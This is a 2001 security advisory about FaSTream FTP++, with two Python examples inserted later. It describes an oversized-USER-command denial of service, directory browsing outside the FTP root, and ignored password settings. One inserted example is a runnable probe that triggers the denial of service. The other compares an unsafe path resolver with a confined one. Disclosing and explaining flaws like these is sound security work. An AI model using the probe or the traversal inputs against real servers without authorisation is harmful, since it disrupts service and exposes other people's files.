Date: Fri, 19 Jan 2001 21:38:33 +0100
From: SNS Research <[email protected]>
To: [email protected]
Subject: Multiple Vulnerabilities In FaSTream FTP++ (+ ICS Tftpserver DoS)
=-
Note: Be advised that the DoS mentioned below can be traced back to
TFtpServer. This is a (beta) component of the "Internet Component
Suite" for Delphi/C++ Builder, available from http://www.overbyte.be.
Other products using this component could be vulnerable; its creator
has been notified. -- SNS Research
=-
Strumpf Noir Society Advisories
! Public release !
<--#
-= Multiple Vulnerabilities In FaSTream FTP++ =-
Release date: Friday, January 19, 2001
Introduction:
FaSTream FTP++ is a file-sharing application for the various MS
Windows flavours.
FaSTream FTP++ is available from vendor Fastream Technologies'
website: http://www.fastream.com
Problem(s):
FaSTream FTP++ DoS condition
FaSTream's embedded ftp-server can be rendered unresponsive by sending
it a single request of 2048 bytes or more.
For example:
C:\>ftp victimserver
Connected to victimserver
220 Fastream FTP++ 2 Server Ready
User (victimserver:(none)): aaaaaaaaaaaaaaaaaa(2048 bytes)
After this the server keeps accepting connections, but no longer
responds to any command offered.
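The following is an added example (not part of the original advisory) of a probe for the condition described above: it sends the oversized USER line, then opens a fresh connection and checks whether the server still answers an ordinary command. Because the real server is not available offline, the block also contains a constructed stand-in server that reproduces the described behaviour (connections accepted, nothing answered once a 2048-byte line has been received); the banner text is copied from the advisory's session and the 331/200/221 replies are assumptions about a healthy server, not observed output.

```python
import socket
import socketserver
import threading

# Outcomes returned by probe()
STILL_RESPONDING = "still responding"
ACCEPTS_BUT_SILENT = "accepts connections but answers no commands"
REFUSES_CONNECTIONS = "refuses connections"


def build_oversized_user(length=2048):
    """A USER command whose argument is `length` bytes, as in the advisory's example."""
    return b"USER " + b"a" * length + b"\r\n"


def read_reply(sock, timeout):
    """Read one chunk of server output; None if nothing arrives within `timeout` seconds."""
    sock.settimeout(timeout)
    try:
        data = sock.recv(4096)
    except socket.timeout:
        return None
    return data or None


def probe(host, port, length=2048, timeout=3.0):
    """Send the oversized USER line, then check from a second connection whether the
    server still answers commands. Distinguishes a healthy server, the state the
    advisory describes (accepts, never replies) and a server that stopped listening."""
    with socket.create_connection((host, port), timeout=timeout) as first:
        read_reply(first, timeout)                  # 220 banner
        first.sendall(build_oversized_user(length))
        read_reply(first, timeout)                  # healthy: 331/530; wedged: silence
    try:
        second = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return REFUSES_CONNECTIONS
    with second:
        read_reply(second, timeout)                 # banner may or may not arrive
        second.sendall(b"USER anonymous\r\n")
        reply = read_reply(second, timeout)
    return STILL_RESPONDING if reply else ACCEPTS_BUT_SILENT


class FakeFtpHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in for the vulnerable server (assumption, not the real
    product): after any command line of 2048+ bytes it keeps accepting
    connections but never replies again."""
    wedged = False  # shared across connections, like the real server's state

    def handle(self):
        if FakeFtpHandler.wedged:
            while self.request.recv(4096):          # accept, stay silent until client quits
                pass
            return
        self.wfile.write(b"220 Fastream FTP++ 2 Server Ready\r\n")
        while True:
            line = self.rfile.readline(65536)
            if not line:
                return
            if len(line.rstrip(b"\r\n")) >= 2048:
                FakeFtpHandler.wedged = True
                while self.request.recv(4096):
                    pass
                return
            if line.upper().startswith(b"QUIT"):
                self.wfile.write(b"221 Goodbye\r\n")
                return
            self.wfile.write(b"331 Password required\r\n" if line.upper().startswith(b"USER")
                             else b"200 OK\r\n")


class FakeFtpServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def start_fake_server(host="127.0.0.1"):
    """Start the stand-in on an ephemeral loopback port; returns (server, port)."""
    FakeFtpHandler.wedged = False
    server = FakeFtpServer((host, 0), FakeFtpHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_fake_server()
    try:
        print(probe("127.0.0.1", port, length=10, timeout=1.0))
        print(probe("127.0.0.1", port, length=2048, timeout=1.0))
    finally:
        server.shutdown()
        server.server_close()
```

Against a real target, call probe() with the host and port of the FTP++ server and no stand-in; a result of ACCEPTS_BUT_SILENT is the condition the advisory describes, and the second connection is what separates it from a server that has simply crashed.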
FaSTream FTP++ path disclosure/directory browsing
When a root directory is set for the ftp-server, any user with access
to the ftp-server can not only learn the absolute path of this
directory, but can also break out of it and obtain listings of other
directories and drives on the same machine.
ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
(listing of c:\)
226 File sent ok
ftp: xx bytes received in x.xx seconds xxKbytes/sec.
The same works for other drives, e.g. ls d:/.
Note: FTP++ server is an entry level read-only server with no user
permissions (anonymous ftp). Users don't have any form of read/write
access to files outside the server-directory.
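As an added example (not code from the advisory or from the vendor), the check whose absence produces the listings above: a client argument such as "c:/" or "d:/" is joined onto the FTP root and, because a drive-absolute Windows path replaces whatever it is joined to, the root simply disappears. The hardened form resolves the path the same way and then refuses anything that does not stay below the root. The vulnerable function is a constructed reproduction of the described behaviour, not the vendor's actual code; ntpath is used so the Windows path rules apply on any host, and the example also covers "../", a general traversal not shown in the advisory's session.

```python
import ntpath

FTP_ROOT = r"C:\FTPROOT"   # the advisory's example root; any absolute Windows path works


def resolve_unsafe(root, requested):
    """Vulnerable behaviour (constructed to match the advisory): the client's
    argument is joined onto the root and normalised, but the result is never
    checked, so a drive-absolute argument such as "c:/" replaces the root
    entirely and ".." walks above it."""
    return ntpath.normpath(ntpath.join(root, requested.replace("/", "\\")))


def resolve_confined(root, requested):
    """Hardened form: resolve the same way, then refuse anything whose
    normalised, case-folded form is not the root itself or a path below it.
    Returns the resolved path, or None when the request would leave the root."""
    root_n = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normpath(ntpath.join(root, requested.replace("/", "\\")))
    cand_n = ntpath.normcase(candidate)
    # the trailing separator stops "C:\FTPROOT2" passing as a prefix match of "C:\FTPROOT"
    if cand_n == root_n or cand_n.startswith(root_n.rstrip("\\") + "\\"):
        return candidate
    return None


if __name__ == "__main__":
    for arg in ("c:/", "d:/", "../", "pub/file.txt"):
        print(f"{arg!r:16} unsafe -> {resolve_unsafe(FTP_ROOT, arg)!r:28} "
              f"confined -> {resolve_confined(FTP_ROOT, arg)!r}")
```

The comparison is done on the normalised path rather than on the raw argument, so rejecting "c:" or ".." as substrings is unnecessary and would miss encodings that normalise to the same thing.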
FaSTream FTP++ password protection
Although the server part of FaSTream FTP++ features a password
protection option in its settings panel, the username/password
combinations, as stored in the (unencrypted) servername.fpl file,
have no relevance to the login process. We've been told that the
commands "USER" and "PASS" are there just to maintain compatibility
with other ftp clients. FTP++ is not, nor is it intended to be, an
industry-strength ftp server.. obviously.
(..)
Solution:
Vendor has been notified and has uploaded FaSTream FTP++ Beta 10
Build 3 to its site, which fixes the path disclosure problem.
There is at this time no known fix for the DoS. This was tested
against FaSTream FTP++ 2 Beta 10 Build 2.
yadayadayada
SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant; all information is provided on an AS IS basis.
EOF, but Strumpf Noir Society will return!